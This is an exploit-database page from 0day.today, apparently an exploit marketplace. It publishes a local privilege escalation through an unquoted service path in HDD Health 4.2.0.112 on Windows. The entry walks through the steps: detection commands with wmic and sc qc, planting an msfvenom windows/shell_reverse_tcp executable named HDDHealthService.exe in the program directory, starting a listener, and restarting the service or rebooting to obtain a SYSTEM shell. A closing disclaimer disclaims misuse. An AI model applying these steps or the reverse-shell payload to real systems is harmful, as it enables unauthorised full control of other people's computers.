0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HDD Health 4.2.0.112 - (HDDHealth) Unquoted Service Path Vulnerability
[# Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Vendor Homepage: https://www.panterasoft.com
# Software Link: https://hdd-health.softonic.com
# Version : 4.2.0.112
# Tested on: Windows 11 64bit
# CVE : N/A
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
Description:
==============================
HDD Health installs a service with an unquoted service path.
To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "HDDHealth" ]
4. The command would return..
C:\>sc qc "HDDHealth"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HDDHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\HDD Health\HDDHealthService.exe
LOAD_ORDER_GROUP :
TAG : 0
ISPLAY_NAME : HDDHealth
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it to HDDHealthService.exe.
7. Make sure you have write permissions to "C:\Program Files (x86)\HDD Health" directory.
8. Provided that you have right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory.
9. Start a listener.
9. Now restart the HDDHealth service by giving coommand [ sc stop HDDHealth ] followed by [ sc start HDDHealth ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.
During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# 0day.today [2024-11-15] #